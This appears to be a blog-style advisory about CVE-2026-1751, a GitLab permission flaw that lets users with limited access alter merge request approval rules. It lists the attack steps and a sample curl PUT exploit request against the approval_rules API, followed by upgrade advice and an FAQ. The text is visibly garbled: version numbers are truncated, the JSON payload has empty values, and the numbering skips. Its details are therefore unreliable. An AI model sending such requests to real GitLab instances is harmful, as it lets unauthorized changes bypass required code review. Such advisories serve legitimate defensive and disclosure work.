---

What Is CVE-2026-1751?

CVE-2026-1751 is a newly disclosed security vulnerability found in GitLab Community Edition (CE) and Enterprise Edition (EE). The flaw affects all versions starting from 16.8 up to (but not including) 18.5.. It could have let attackers or unauthorized users alter merge request approval rules under certain conditions, possibly allowing code changes to be merged without following the required review process.

If your team or company uses an impacted version, it's crucial to patch this as soon as possible.

Why Does It Matter?

GitLab’s merge request approval rules help teams enforce code quality and security by requiring certain people or groups to approve changes before they’re merged into important branches. If these rules are tampered with by unauthorized users, malicious or accidental code changes could go live without the right checks.

How Does the Vulnerability Work?

CVE-2026-1751 emerged from improper permission checks in some versions of GitLab. Under certain scenarios, an attacker who has at least limited access to a project *but not the required privilege to edit approval rules* could craft HTTP requests that would trick the backend into accepting unauthorized changes.

Gain Project Access: Get guest or developer access to a target repository.

2. Craft a Malicious Request: Use a REST client (like Postman or curl) to manually build requests that update or remove merge request approval rules.
3. Submit the Request: Send it directly to the vulnerable backend endpoint—bypassing the UI, which does enforce correct permissions.
4. Rule Changed: GitLab incorrectly saves the new rule, letting the attacker bypass normal review controls.

Sample Exploit Code

Below is a simple exploit example using curl. This assumes the attacker has a valid GitLab account and project access, but not enough to normally change approval rules.

curl -X PUT \
  -H "PRIVATE-TOKEN: <attacker_access_token>" \
  -H "Content-Type: application/json" \
  -d '{"approvals_required": , "approval_rules_attributes": [{"name": "Security", "approvals_required": }]}' \
  "https://gitlab.example.com/api/v4/projects/<project_id>/merge_requests/<mr_iid>/approval_rules/<rule_id>";

Note: Replace fields enclosed with angle brackets (< >) with real values like your target project ID, merge request IID, and approval rule ID.

With vulnerable versions, if the backend does not correctly check the attacker's permissions, the approval rule quietly changes.

1. Upgrade GitLab Now

The official fix is in GitLab 18.5. and above. Upgrade your instance as soon as possible.

Official GitLab release notes

- GitLab Security Release: 18.5.

3. Remove Unneeded Users

Reduce project access for people who don’t need it. The stricter you are with permissions, the safer your codebase will be.

Additional References

- Official GitLab Advisory for CVE-2026-1751 (blog/gitlab documentation)
- CVE page on NIST *(may not be live yet)*

Short FAQ

Q: Was unauthorized code actually merged in the wild using this bug?
A: As of this writing, there are no public reports of real attacks, but the risk is significant.

Q: What branches are at risk?
A: Any branch with approval rules set is potentially vulnerable, especially main and protected branches.

Q: Why didn't the UI block me?
A: The UI is properly secured. This only worked by talking directly to the backend API.

In Summary

CVE-2026-1751 is a big deal if you use GitLab and depend on merge request approvals for code safety.
Attackers could secretly weaken your code review process.
Fix: Upgrade to 18.5.+ and check your rules!

Timeline

Published on: 02/02/2026 09:04:38 UTC
Last modified on: 02/04/2026 14:34:06 UTC